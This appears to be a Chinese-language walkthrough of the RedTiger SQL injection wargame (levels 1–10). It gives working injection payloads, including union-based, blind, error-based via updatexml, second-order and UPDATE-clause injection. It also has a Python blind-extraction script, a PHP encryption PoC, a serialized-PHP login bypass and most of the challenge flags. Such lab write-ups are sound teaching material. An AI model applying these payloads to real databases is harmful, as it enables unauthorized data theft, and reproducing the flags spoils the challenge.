redtiger sql注入笔记

level1

通过观察发现这道题为数字型注入,而且已知tablename为level1_users 直接在后面联合查询一下就好 You can raise your wechall.net score with this flag: 27cbddc803ecde822d87a7e8639f9315

level2

一个登录的地方,试一下万能密码,莫名其妙的就过了2333 You can raise your wechall.net score with this flag: 1222e2d4ad5da677efb188550528bfaa

level3

构造错误usr[0]=1&usr[1]=1 得到报错信息,继而得到加密源码由源码得到poc

<?php

// warning! ugly code ahead :)

function encrypt($str)
{
$cryptedstr = "";
srand(3284724);
for ($i =0; $i < strlen($str); $i++)
{
$temp = ord(substr($str,$i,1)) ^ rand(0, 255);

while(strlen($temp)<3)
{
$temp = "0".$temp;
}
$cryptedstr .= $temp. "";
}
return base64_encode($cryptedstr);
}

function decrypt ($str)
{
srand(3284724);
if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str))
{
$str = base64_decode($str);
if ($str != "" && $str != null && $str != false)
{
$decStr = "";

for ($i=0; $i < strlen($str); $i+=3)
{
$array[$i/3] = substr($str,$i,3);
}

foreach($array as $s)
{
$a = $s ^ rand(0, 255);
$decStr .= chr($a);
}

return $decStr;
}
return false;
}
return false;
}
$str1 = "' union select 1,password,2,3,4,5,6 from level3_users where username='Admin ";
echo encrypt($str1);
?>

获得flag

level4

由题目得到id中存在注入,继续分析,发现没有报错以及数据,可以判断是一道盲注

from urllib2 import *
import string
from re import *

char=string.lowercase+'!'
url = "http://redtiger.labs.overthewire.org/level4.php?id=1%20and%201=(select%20count(*)%20from%20level4_secret%20where%20SUBSTR(keyword,"
header = {'Cookie':'level4login=there_is_no_bug'}
key = ""
for i in range(1,22):
    for c in char:
        url1 = url + str(i) +",1)='"+c+"')"
        request1 = Request(url1,None,headers=header)
        request1 = urlopen(request1)
        if "Query returned 1 rows." in (request1.read()):
            key = key+c
            print key
print key

得到key之后提交

lvevl5

首先分析提交的参数发现username存在注入,进行联合查询,发现admin被ban了,所以将admin十六进制转化一下,最后的payload:' union select 0x61646d696e as username, md5(1) as password # 得到flag

level6

挺明显的一个二次注入(ps:我也忘记是不是叫这名了)反正经过试验得到几个关键点 1. 由user来查询用户名,猜测语句为select column_name from table_name where id = $id并且知道是数字型注入。 2. 再由查询到的username什么的查询Email字段 猜测语句为select email from table_name where username = '上语句查询结果',并将查询结果返回。 3.我们可以操纵1的结果就可以进行注入。 4.过滤了关键字段,

最终payload: 0%20union%20select%201,0x2720756e696f6e2073656c65637420312c757365726e616d652c332c70617373776f72642c352066726f6d206c6576656c365f75736572732077686572652069643d33202d2d20,1,1,1%20from%20level6_users%20where%20

得到flagYou can raise your wechall.net score with this flag: 074113b268d87dea21cc839954dec932

level7

在search后加一个单引号即可查询到语句SELECT news.*,text.text,text.title FROM level7_news news, level7_texts text WHERE text.id = news.id AND (text.text LIKE '%1' %' OR text.title LIKE '%1' %')

最终payload1%') union select 1,2,3,autor from level7_news --%a0

(ps:刚开始我忘记%a0这种东西,一直在用各种奇怪的姿势乱试233) 得到flag: You can raise your wechall.net score with this flag: 970cecc0355ed85306588a1a01db4d80

level8

猜测后台的sql语句应该是update table set name='inputname',email='inputemail',icq='inputicq',age='inputage' where id=1,那么我们在Email字段输入hans%40localhost',name=password,icq=',执行的sql语句将会是update table set name='hans%40localhost',name=password,icq='',email='inputemail',icq='inputicq',age='inputage' where id=1。因为在update语句中出现了两个相同的name字段,实际上name字段的值会被赋为后一个。

最后flagYou can raise your wechall.net score with this flag: 9ea04c5d4f90dae92c396cf7a6787715

level9

我觉得他们的方法都并不那么好用,咱们可以用updatexml来回显我们先要的信息,关于这个我在从零开始的sql注入中已经讲过了2333

payload:autor=1'&title=1'&text=1' or updatexml(1,concat(0x7e,(select password from level9_users),0x7e),0))#&post=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

不过这道题限制了回显的字符数,你可以用right函数来绕过。

flag:You can raise your wechall.net score with this flag: 84ec870f1ac294508400e30d8a26a679

level10

题目要求我们用TheMaster登录。把username改成TheMaster,password改成boolean类型的true即可绕过。a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;},base64编码之后是YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=

flag为You can raise your wechall.net score with this flag:721ce43d433ad85bcfa56644b112fa52

redtiger全部完成后会在最后加上你的名字哦。